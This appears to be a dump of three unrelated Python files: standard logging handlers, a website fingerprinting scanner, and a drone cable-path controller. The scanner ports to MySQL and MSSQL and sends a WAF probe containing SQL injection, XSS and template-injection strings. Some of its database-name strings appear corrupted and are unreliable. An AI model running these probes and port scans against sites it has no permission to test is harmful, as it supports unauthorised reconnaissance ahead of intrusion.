The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
FingerprintIdentifier.py
|
import requests
import lib.fingerprint.FingerprintLoader
import lib.controller.FunctionLib
import re
import threading
import hashlib
import queue
import socket
import sys
import urllib2
import time
# Debug options.
# Make sure you know what are you doing.
# todo: Change mode after debug
debug = False
class FingerprintIdentifier():
def __init__(self):
self.site = None
self.url = None
self._FingerprintLoader = lib.fingerprint.FingerprintLoader.FingerprintLoader()
self._counter = 0
self.RawResp = None
self.CMS = []
self.WAF = []
self.OperatingSystem = []
self.Database = []
self.SiteLanguage = None
self._thread = 10
self._CMSVerison = []
self._ThreadLock = False
self._Time = 0
self.StopFlag = False
def CheckMode(self,mode):
if mode == 'tmp':
self.url = self.site
return
def CheckSiteFingerprint(self):
try:
self.RawResp = requests.get('http://%s/' %(self.url))
self.SiteLanguage = self.CheckSiteLanguage()
self.CMS = self.CheckSiteCMS()
except Exception, e:
print '[!] Failed to check fingerprint: %s' %(str(e))
print sys.exc_info()[0]
pass
def CheckSiteLanguage(self):
self.RawResp = requests.get('http://%s/' % (self.url))
HeadersText = ''
for item in self.RawResp.headers.keys():
HeadersText += str(item)
HeadersText += ':'
HeadersText += self.RawResp.headers[item]
HeadersText += '\n'
if re.findall('asp|aspx|iis|microsoft|windows server',HeadersText, re.I+re.M):
self.SiteLanguage = 'dotnet'
elif re.findall('php',HeadersText, re.I+re.M):
self.SiteLanguage = 'php'
elif re.findall('jsp|coyote|tomcat|java',HeadersText, re.I+re.M):
self.SiteLanguage = 'jsp'
else:
self.SiteLanguage = 'other'
if self.SiteLanguage:
print '[+] Language of %s is %s' %(str(self.url), self.SiteLanguage)
else:
print '[*] No language found.'
print '[+] Language check complete.'
return self.SiteLanguage
def LoadFingerprint(self):
try:
self._FingerprintLoader.Language = self.SiteLanguage
FingerprintList = self._FingerprintLoader.LoadSiteFingerprint()
except Exception,e:
print '[!] Error loading fingerprint: %s' %(str(e))
FingerprintList = None
return FingerprintList
def CheckSiteCMS(self):
self.StopFlag = False
self.SiteLanguage = self.CheckSiteLanguage()
CMSFingerprints = self.LoadFingerprint()
CMSList = []
if not CMSFingerprints:
return None
HashList = CMSFingerprints['hashes']
PageList = CMSFingerprints['pages']
HeaderList = CMSFingerprints['headers']
try:
Timer = threading.Thread(target=self._Timer)
Timer.setDaemon(True)
Counter = threading.Thread(target=self._ThreadCounter)
Counter.setDaemon(True)
Timer.start()
Counter.start()
self.CheckHash(HashList)
self.CheckPage(PageList)
self.CheckHeader(HeaderList)
if self.CMS:
if len(self.CMS):
print '[+] %s potential CMS found: ' % (str(len(self.CMS)))
for item in self.CMS:
print '[+] Potential CMS: %s' %(str(item))
else:
print '[*] How do you see this?' # If you see this, Hello.
else:
print '[*] CMS not found.'
except KeyboardInterrupt:
print '[*] Stopped.'
except Exception, e:
print '[!] Failed to check CMS: %s' %(str(e))
print '[+] CMS check completed.'
self.StopFlag = True
return self.CMS
def CheckHash(self, json):
TaskList = queue.Queue()
for item in json:
TaskList.put(item)
while True:
if self._thread > self._counter:
self._counter += 1
thread = threading.Thread(target=self._HashChecker, args=[TaskList.get()])
thread.start()
if not TaskList.qsize():
thread.join()
break
def _HashChecker(self, json):
try:
url, cms, hash = json.split('|')
except Exception, e:
print '[!] Failed to unpack json: %s' %(str(e))
self._counter -= 1
return
try:
if debug:
print '[^] DEBUG: Checked hash %s' %(hash)
resp = urllib2.urlopen('http://%s/%s' %(self.url, url), timeout=3).read()
if hashlib.md5(resp).hexdigest() == hash:
if cms not in self.CMS:
print '[+] Potential CMS: %s' % (str(cms))
self.CMS.append(cms)
except urllib2.HTTPError:
pass
except Exception, e:
print '[!] Failed checking cms: %s' %(str(e))
self._counter -= 1
return
def CheckPage(self,json):
TaskList = queue.Queue()
if not json:
return
for i in json:
TaskList.put(i)
while True:
if self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._PageChecker, args=[TaskList.get()])
thread.start()
if not TaskList.qsize():
thread.join()
break
pass
def _PageChecker(self,task):
try:
url, cms, code = re.split('\|', task)
if requests.get('http://%s%s' %(self.url, url), timeout=3).status_code == int(code):
self.CMS.append(cms)
print '[+] Potential CMS of site %s: %s' %(self.url, cms)
except Exception,e :
print str(e)
self._counter -= 1
return
def CheckHeader(self,json):
TaskList = queue.Queue()
for i in json:
TaskList.put(i)
while not TaskList.empty():
if self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._HeaderChecker, args=(TaskList.get()))
thread.start()
return
def _HeaderChecker(self,task):
try:
url, cms, header = re.split('\|', task)
if debug:
print '[^] Checked header: %s' %(header)
if re.findall(header, requests.get('http://%s%s' %(self.url, url), timeout=3).headers):
self.CMS.append(cms)
print '[+] Potential CMS of site %s: %s' %(self.url, cms)
except Exception, e:
print str(e)
self._counter -= 1
pass
def FetchPage(self):
try:
return requests.get(self.url).text
except Exception, e:
return None
def _LoadCMSVersion(self):
CMSVersionList = []
if not self.CMS:
print '[!] CMS not identified.'
return
for i in self.CMS:
CMSVersionList.append(self._FingerprintLoader.LoadCmsVerionFingerprint())
return CMSVersionList
def CheckCMSVersion(self):
CMSVersionList = self._LoadCMSVersion()
if not CMSVersionList:
print '[!] CMS Version of %s is not available.' %(str(self.CMS))
return
if not len(CMSVersionList):
print '[!] Version check for this cms is not available.'
for cms in CMSVersionList:
if not cms:
continue
CMSVersioNFingerprintList = cms['version']
thread = threading.Thread(target=self._CMSVersionChecker, args=(CMSVersioNFingerprintList))
thread.start()
return
def _CMSVersionChecker(self,json):
try:
CMSVersionList = queue.Queue()
for i in json:
CMSVersionList.put(i)
while self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._CheckKeyword,args=(CMSVersionList.get()))
thread.setDaemon(True)
thread.start()
except Exception, e:
print '[!] Error loading CMS version: %s' %(str(e))
return
def _CheckKeyword(self,task):
version, url, keyword = re.split('\|', task)
try:
if re.findall(keyword, requests.get('http://%s%s' %(self.url, url), timeout=3).text):
self._CMSVerison.append(version)
except Exception, e:
print '[!] Error checking CMS version: %s' %(str(e))
self._counter -= 1
return
def CheckWaf(self):
WafList = self._FingerprintLoader.LoadWafFingerprint()
if not WafList:
print '[!] Unable to load WAF fingerprint.'
try:
resp = requests.get('http://%s/?union select 1 and 1=2 and updatexml(1,concat(0x7e,(0x23333),0x7e),1) <script>alert(1)</script> {{1+1}}' %(self.url), timeout=3).text
if not resp:
print '[!] Error fetching page: Empty response.'
return
WafFingerprint = WafList['waf']
for fingerprint in WafFingerprint:
waf, fingerprint = re.split('\|', fingerprint)
if re.findall(fingerprint, resp):
self.WAF.append(waf)
if len(self.WAF) == 0:
print '[+] Check completed, No waf identified.'
else:
print '[+] Check completed, waf identified:'
for waf in self.WAF:
print '[+] WAF of %s is %s' %(self.url, waf)
except requests.ConnectionError:
print '[*] RST flag stopped. WAF identify is not available.'
return
except Exception, e:
print '[!] Error connecting site: %s' %(str(e))
return
return self.WAF
def _WafChecker(self,task):
pass
def CheckDatabase(self):
sess = socket.socket(2,1)
sess.settimeout(3)
try:
print '[*] Starting connection scan.'
sess.connect((self.site,1433))
self.Database = 'mssql (open)'
except:
pass
try:
sess = socket.socket(2,1)
sess.settimeout(3)
sess.connect((self.site,3306))
buf = sess.recv(1024)
if re.findall('mariadb', buf, re.I+re.M):
self.Database = 'mariadb (open)'
else:
self.Database = 'mysql (open)'
except socket.timeout:
pass
except Exception, e:
print '[!] Error during connection scan: %s' %(str(e))
pass
print '[*] Connection scan completed.'
if self.Database:
print '[+] Database type: %s' %(self.Database)
return self.Database
try:
Headers = requests.get('http://%s/' %(self.site), timeout=3).headers
RawHeader = ''
for item in Headers:
RawHeader += item
RawHeader += ':'
RawHeader += Headers[item]
RawHeader += '\n'
Headers = RawHeader
if re.findall('(?i)mysql', Headers):
self.Database = 'mysql'
elif re.findall('(?i)mariadb', Headers):
self.Database = 'mariadb'
elif re.findall('(?i)SQLInjectionScanner server', Headers):
self.Database = 'mssql'
elif re.findall('(?i)mongodb', Headers):
self.Database = 'mongodb'
elif re.findall('postgre', Headers):
self.Database = 'postgre SQLInjectionScanner'
else:
self.Database = 'unknown'
print '[+] Database type: %s' %(self.Database)
except Exception, e:
print '[!] Error during header scan: %s' %(str(e))
print '[+] Database check completed.'
return self.Database
def CheckSystem(self):
sess = socket.socket(2,1)
sess.settimeout(3)
try:
Headers = requests.get('http://%s/' %(self.site), timeout=3).headers
if re.findall('(?i)iis|asp|aspx|windows|\.net|microsoft',str(Headers)):
self.OperatingSystem = 'Windows'
elif re.findall('(?i)Linux|ubuntu|centos|redhat|debian|manjaro|arch|deepin|mint|suse|oracle', str(Headers)):
self.OperatingSystem = 'Linux'
elif re.findall('(?i)bsd', str(Headers)):
self.OperatingSystem = 'BSD'
elif re.findall('(?i)unix', str(Headers)):
self.OperatingSystem = 'Unix'
else:
self.OperatingSystem = None
except Exception, e:
print '[!] Error getting server system: %s' %(str(e))
if self.OperatingSystem:
print '[+] Server system is %s' %(str(self.OperatingSystem))
return self.OperatingSystem
try:
PortList = {21: '*nix', 3389: 'windows', 445: 'windows', 1433: 'windows'}
for port in PortList.keys():
try:
sess = socket.socket(2,1)
sess.settimeout(3)
sess.connect((self.url, port))
self.OperatingSystem = PortList[port]
except socket.timeout or socket.error:
continue
except Exception, e:
print '[!] Error checking system: %s' %(str(e))
pass
if not self.OperatingSystem:
self.OperatingSystem = 'Unknown'
print '[+] Server system is %s' %(self.OperatingSystem)
return self.OperatingSystem
def _Timer(self):
while True:
time.sleep(1)
self._Time += 1
def _ThreadCounter(self):
while not self.StopFlag: # Nasty hack for unknown bugs. todo: Debug
time.sleep(10)
print '[*] Fingerprint Identifier: Time: %d second(s), %s thread(s) working.' %(self._Time, self._counter)
|
cableController.py
|
# cableController.py
# shotmanager
#
# The cable movement controller.
# Runs as a DroneKit-Python script.
#
# Created by Jon Challinger and Will Silva on 1/21/2015.
# Copyright (c) 2016 3D Robotics.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from catmullRom import CatmullRom
from vector3 import *
from numpy import linspace
import math
import threading
import itertools
# epsilon to detect if we've reached a target in meters
TARGET_EPSILON_M = 0.1
# Length of each segment that is assigned a maximum speed based on its maximum curvature
CURVATURE_MAP_RES = 1. # meters
def goldenSection(func, a, b, tol = 1e-5):
gr = 0.61803398875
c = b - gr * (b - a)
d = a + gr * (b - a)
fc = func(c)
fd = func(d)
while abs(c-d) > tol:
if fc < fd:
b = d
d = c
c = b - gr * (b - a)
fd = fc
fc = func(c)
else:
a = c
c = d
d = a + gr * (b - a)
fc = fd
fd = func(d)
return (b+a) / 2.
def constrain(val,minval,maxval):
if val < minval:
return minval
elif val > maxval:
return maxval
return val
class CableController():
def __init__(self, points, maxSpeed, minSpeed, tanAccelLim, normAccelLim, smoothStopP, maxAlt):
# Maximum tangential acceleration along the cable, m/s^2
self.tanAccelLim = tanAccelLim
# Maximum acceleration normal to the cable, m/s^2
self.normAccelLim = normAccelLim
# Smoothness of stops at the endpoints and at targets along the cable
self.smoothStopP = smoothStopP
# Maximum speed along the cable, m/s
self.maxSpeed = maxSpeed
# Minimum speed along the cable, m/s
self.minSpeed = minSpeed
# Minimum allowable position.z, meters (AKA max altitude), Convert Altitude (NEU) to NED
if maxAlt is not None:
self.posZLimit = -maxAlt
else:
self.posZLimit = None
# Input speed
self.desiredSpeed = 0.
# Current speed along the cable, m/s
self.speed = 0.
# Catmull-Rom spline with added virtual tangency control points at either end
self.spline = CatmullRom([points[0]*2 - points[1]]+points+[points[-1]*2 - points[-2]])
# Number of spline segments (should really come from CatmullRom)
self.numSegments = len(points)-1
# Current position in P domain, parameter normalized to cable total arc length
self.currentP = 1.0
# Target position in P domain
self.targetP = self.currentP
# Previously reached target, once set
self.prevReachedTarget = None
# Current segment, ranges from 0 to # of segments-1
self.currentSeg, self.currentU = self.spline.arclengthToNonDimensional(self.currentP)
# Current position as a Vector3, meters
self.position = self.spline.position(self.currentSeg, self.currentU)
# Current velocity as a Vector3, m/s
self.velocity = Vector3()
# Flag to indicate that the maximum altitude has been exceeded
self.maxAltExceeded = False
# Number of segments in curvature map
self.curvatureMapNumSegments = int(math.ceil(self.spline.totalArcLength/CURVATURE_MAP_RES))
# Number of joints in curvature map
self.curvatureMapNumJoints = self.curvatureMapNumSegments+1
# Curvature map joint positions in p domain
self.curvatureMapJointsP, self.curvatureMapSegLengthP = linspace(0., 1., self.curvatureMapNumJoints, retstep = True)
# Curvature map segment length in meters
self.curvatureMapSegLengthM = self.curvatureMapSegLengthP * self.spline.totalArcLength
# Non-dimensional curvature map joint position (cache)
self.curvatureMapJointsNonDimensional = [None for _ in range(self.curvatureMapNumJoints)]
# Speed limits for each curvature map segment (cache)
self.curvatureMapSpeedLimits = [None for _ in range(self.curvatureMapNumSegments)]
# Thread lock on curvature map segments
self.curvatureMapLocks = [threading.Lock() for _ in range(self.curvatureMapNumSegments)]
self.curvatureMapSegmentsComputedLock = threading.Lock()
# number of map segments that have been computed by the curvatureMapThread
self.curvatureMapSegmentsComputed = 0
# flag that indicates to the thread to die
self.poisonPill = False
# setup a worker thread to compute map segment maximum speeds
self.curvatureMapThread = threading.Thread(target=self._computeCurvatureMap)
self.curvatureMapThread.setDaemon(True)
# start the worker thread
self.curvatureMapThread.start()
def __del__(self):
self.poisonPill = True
self.curvatureMapThread.join(timeout = 2)
# Public interface:
def reachedTarget(self):
'''Return True if we've reached the target, else False'''
return abs(self.currentP - self.targetP) * self.spline.totalArcLength < TARGET_EPSILON_M
def setTargetP(self, targetP):
'''Interface to set a target P'''
self.targetP = targetP
def trackSpeed(self, speed):
'''Updates controller desired speed'''
self.desiredSpeed = speed
def update(self, dt):
'''Advances controller along cable by dt'''
# Speed always in direction of target
self.desiredSpeed = math.copysign(self.desiredSpeed, self.targetP - self.currentP)
self.speed = constrain(self._constrainSpeed(self.desiredSpeed), self.speed - self.tanAccelLim*dt, self.speed + self.tanAccelLim*dt)
self._traverse(dt)
def setCurrentP(self,p):
'''Sets the controller's current P position on the cable'''
self.currentP = p
self.currentSeg, self.currentU = self.spline.arclengthToNonDimensional(self.currentP)
def killCurvatureMapThread(self):
'''Sets poisonPill to True so the curvatureMapThread knows to die'''
self.poisonPill = True
# Internal functions:
def _computeCurvatureMap(self):
'''Computes curvature map, prioritizes map construction based on vehicle position and direction of motion'''
while True:
searchStart = self._getCurvatureMapSegment(self.currentP)
if self.speed > 0:
# Search ahead, then behind
for i in range(searchStart, self.curvatureMapNumSegments)+list(reversed(range(0, searchStart))):
if self._computeCurvatureMapSpeedLimit(i):
break
elif self.speed < 0:
# Search behind, then ahead
for i in list(reversed(range(0, searchStart+1)))+range(searchStart+1, self.curvatureMapNumSegments):
if self._computeCurvatureMapSpeedLimit(i):
break
else: # speed == 0
# Search alternately ahead and behind
searchList = [x for t in list(itertools.izip_longest(range(searchStart, self.curvatureMapNumSegments), reversed(range(0, searchStart)))) for x in t if x is not None]
for i in searchList:
if self._computeCurvatureMapSpeedLimit(i):
break
# if all map segments have been computed then quit the thread
with self.curvatureMapSegmentsComputedLock:
if self.curvatureMapSegmentsComputed == self.curvatureMapNumSegments:
self.poisonPill = True
if self.poisonPill:
break
def _computeCurvatureMapSpeedLimit(self, mapSeg):
'''Computes speed limit for the requested map segment'''
with self.curvatureMapLocks[mapSeg]:
# if the speed limit has already been computed for this map segment, then don't do any work
if self.curvatureMapSpeedLimits[mapSeg] is not None:
return False
# if non-dimensional parameter has not yet been created for the associated left joint, then create it
if self.curvatureMapJointsNonDimensional[mapSeg] is None:
self.curvatureMapJointsNonDimensional[mapSeg] = self.spline.arclengthToNonDimensional(self.curvatureMapJointsP[mapSeg])
# if non-dimensional parameter has not yet been created for the associated right joint, then create it
if self.curvatureMapJointsNonDimensional[mapSeg+1] is None:
self.curvatureMapJointsNonDimensional[mapSeg+1] = self.spline.arclengthToNonDimensional(self.curvatureMapJointsP[mapSeg+1])
# split returned non-dimensional parameter tuple (seg,u) into separate values
seg1, u1 = self.curvatureMapJointsNonDimensional[mapSeg]
seg2, u2 = self.curvatureMapJointsNonDimensional[mapSeg+1]
# returns arc length for current spline segment, or the larger of the two segments if our map segment spans across multiple spline segments
maxSegLen = max(self.spline.arcLengths[seg1:seg2+1]) # m
# run a golden section search to find the segment,u pair for the point of maximum curvature in the requested map segment
# (segment,u) are stored as segment+u, e.g. segment 1, u = 0.25 -> 1.25
maxCurvatureSegU = goldenSection(lambda x: -self.spline.curvature(int(x), x-int(x)), seg1+u1, seg2+u2, tol = 1e-1/maxSegLen)
# run a golden section search to find the segment,u pair for the point of minimum Z (aka max altitude)
minPosZSegU = goldenSection(lambda x: self.spline.position(int(x), x-int(x)).z, seg1+u1, seg2+u2, tol = 1e-1/maxSegLen)
# split segment+u into segment,u and evaluate curvature at this point
maxCurvature = self.spline.curvature(int(maxCurvatureSegU),maxCurvatureSegU-int(maxCurvatureSegU))
#split segment+u into segment,u and evalute position.z at this point
minPosZ = self.spline.position(int(minPosZSegU),minPosZSegU-int(minPosZSegU)).z #m
# this prevents the copter from traversing segments of the cable
# that are above its altitude limit
